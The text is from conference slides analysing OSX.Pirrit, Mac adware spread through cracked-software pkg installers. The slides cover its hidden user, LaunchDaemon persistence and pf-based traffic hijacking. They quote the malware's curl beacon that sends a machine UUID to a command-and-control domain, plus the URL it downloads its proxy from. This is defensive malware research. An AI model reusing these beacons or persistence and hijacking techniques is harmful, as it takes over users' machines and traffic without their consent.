osx/pirrit: the blue balls of os x adware

© 2016 Cybereason Inc. All rights reserved.

OSX.Pirrit: The blue balls of OS X adware


$ whoami

• Amit Serper (What’s with the weird name, dude?)

• Lead OS X and Linux security researcher @ Cybereason• Low level research (Kernel, reversing, etc...)• Writing poorly programmed attack simulation tools (crappy coder)• Malware research• HackingTeam server research (with @awfrazer):

• Slides: http://hackedteam.lol• Paper: http://ht-paper.amit.wtf• Blogs: http://ht1.amit.wtf, http://ht2.amit.wtf

• Lead security researcher @ Israeli government agency (9 years)• <REDACTED>

• Follow me on twitter: @0xAmit


$ cat /etc/motd


$ cat /Users/amit/agenda.txt

This talk is based on my blog post on objective-see.com. See direct link: http://pirrit.amit.wtf


$ cat /Users/amit/agenda.txt

1. For those that weren’t around 15 years ago: Intro to adware2. This apple is getting ripe: Adware on Mac3. The blue balls: OSX.Pirrit


Intro to Adware

• Adware usually gets to your machine with installers.• These installers install a program that you downloaded and then offer you to

add some other program that will enhance your expirience


Intro to Adware

1. Software that resides on one’s machine and displays ads2. Adware divide into several categories:

A. Plain and stupid – Just displays popups without any contextB. The “norm” – Displays banners (and rarely popups) according to basic

metrics that are gathered from the browserC. The black-ops operative – Installs a hidden program that can see your

entire traffic, injects ads to pages you visit and even over-rides legitimate ads that were put there in the first place (That’s stealing!)


Adware on the Mac

1. Similar to windows, adware to OS X comes usually in the form of toolbars2. These toolbars are safari plugins – like Spigot…

http://www.thesafemac.com/arg-spigot


Adware on the Mac

1. Similar to windows, adware to OS X comes usually in the form of toolbars2. These toolbars are safari plugins – like Spigot…3. Spigot also installs LaunchAgents!

http://www.thesafemac.com/arg-spigot


The story begins…

• An irc user “Xiano” popped in to #osxre @ freenode and told us that his friend’s mac is acting weird

• He said that internet browsing is rather slow and some weird processes are showing up.

• He then shared with us a weird executable called “sizzling”.• Another channel member, “Paraxor” started reversing that executable and

quoted some function names

• It was immediately clear that this is some sort of adware because of these strings


No, seriously you guys…


Qt?

• Qt (pronounced cute) is a cross-platform application development framework• Allows a developer to maintain a single codebase for an application that will

run on Windows, Linux, Mac and other platforms…• The ”cost” of that are a lot of external libraries that are linked with your

application


The story begins… (continued)

http://forums.macrumors.com/threads/what-is-unillumination-process-mavericks.1966015/


Let’s look at the binary (strings table)


Another URL in the strings table


Let’s google that url…

http://shorte.st/st/2904deaf2db062b776f39f499bf88ad9/%1

Gives 1 result to a JoeSandbox analysis of a Windows PE executable


Shorte.st – URL shortening service


Let’s google that…


Let’s look at the script – rec_script.sh


Windows is easy…


But removal instructions for mac?


Xiano was back with more…

• He found an app bundle called “DemoUpdater” on his friend’s machine.• He mentioned that this app bundle was running under a different user which he

did not know.• Inside the app bundle was a x64 Mach-O binary executable and a shell script

called Update2.sh.• This was far more interesting.


In the executable - Suspicious functions and strings galore!


Mysterious domains

*.93a555685cc7443a8e1034efa1f18924.com *.aa625d84f1587749c1ab011d6f269f7d64.com *.2ff328dcee054f2f9a9a5d7e966e3ec0.com *.aae219721390264a73aa60a5e6ab6ccc4e.com


And also… Some more windows crap


But what about that update2 shell script?

• When the executable finishes running, it executes Update2.sh• It’s a HUGE script (330 lines) – it even has some inline python code (python –c)

• Gets the machine uuid via command line (ioreg, parses its huge output with awk and grep)

• Sends the machine ID to a server in order to get a new ID back from the server by issuing a curl command:curl "http://93a555685cc7443a8e1034efa1f18924.com/v/cld?mid=<UUID>&ct=pd"

• It validates your geolocation by curl’ing ipinfo.io/country and checks that you are from US, UK, Spain, Australia, France, Germany, India, Italy, Netherlands or New Zealand in order to download a different “ad package”.

• It’s updating the C&C and telling it that the installation was successful, it uses the uuid as an identifier.

• After the C&C was notified, the script will download and install another program called “DemoInjector”


So here’s what we know until now

• It’s an adware• It generates traffic • It’s cross-platform• It’s definetly trying to hide strings and domains inside the binary• It adds a hidden user with a weird name – it has to get root access• It runs weird processes with strange names• It has a componenet called “DemoUpdater”


But here’s what no one knows

How the hell did people get infected?!


FLASH SIDEWAYS!


PKG file?

• Mac equivalent of the MSI (Installer file)• An extensible archive format (XAR)• Has a nice wizard with useful EULA messages• Can be signed with a developer certificate• Has the ability to run pre/post install scripts!


PKG file!

• Pkg files are a very convenient way to drop malware• You can codesign them• And you can just use the scripting features to do whatever you want to.


PKG file – Suspicious package

http://www.mothersruin.com/software/SuspiciousPackage/


PKG file – Suspicious package


Let’s look at this script


Entire process

User downloads crack Gets pkg Pre install script

runs

Script downlodas “DemoUpdater”

component

DemoUpdater prepares the

infrastructure for DemoInjector

Profit!


DemoUpdater

• DemoUpdater is the first component that’s actually being installed by Pirrit.• This is the component that lays the groundwork for the traffic hijacking proxy• This is the script that generates the strange names

• After a random name was generated, it is being written to com.common.plist• It then creates another plist to hold its preferences. That plist is created with a

random name on each install (com.<RANDOMWORD>.preferences.plist)


DemoUpdater

• The script then carries on with creating the DemoUpdater bundle and executable while not forgetting to change its name to make detection harder

• It then downloads the next component, DemoInjector and adding a LaunchDaemon for it.


Wait… LaunchDaemons?

• A LaunchDaemon is an autorun in Mac speak• It loads when the computer boots• And just like everything in OS X, it’s also stored in a plist file


The soil is ready… Now – plant the seed

• After all of the basic building blocks were layed, it is time for the main event• We have a random name generated for DemoUpdater• We have an autorun set up for DemoUpdater• Now it’s time to get the proxy and get crackin’!• The proxy is DemoInjector (remember it from before?)• It will be downloaded from:

"http://93a555685cc7443a8e1034efa1f18924.com/static/pd_files/dit3.tgz• The number in the tgz file is incremental – different version• The latest version of DemoInjector is dit8 and it is from April 10th 2016.


The soil is ready… Now – plant the seed

• The proxy is called DemoInjector.• It is also a QT project.• It also has a lot of shell scripts!• The most interesting one is install_injector.sh• It also generates a random company name and executable name• And it creates a hidden user!


A hidden user… Oh my!


Hide500Users?


Someone was reading Apple documentation

https://support.apple.com/en-il/HT203998


Someone was reading Apple documentation


Another LaunchDaemon, this time for DemoInjector


And now – Traffic redirection!

• DemoInjector is listening on 127.0.0.1:9882• All of the packets that are generated by everyone but $HIDDEN_USERS are

forwarded to DemoInjector using pf• These settings also exist in another file that is dropped by the installer, called

/etc/change_net_settings. There’s also a LaunchDaemon for that!


Aaaaand… Profit!


Droppers… Droppers everywhere!


I created a small removal script

http://github.com/aserperSome people had problems with it…


Conclusion


THANKS !

1. PATRICK WARDLE / OBJECTIVE-SEE.COM / @PATRICKWARDLE2. DATAGRAM – FOR THE AWESOME HOSPITALITY3. My pals from Cybereason for the moral support (and for picking up the check)4. @VISS5. YOU!


THANKS !

Come see me popping shells @ fail of things right after this!


you.Thank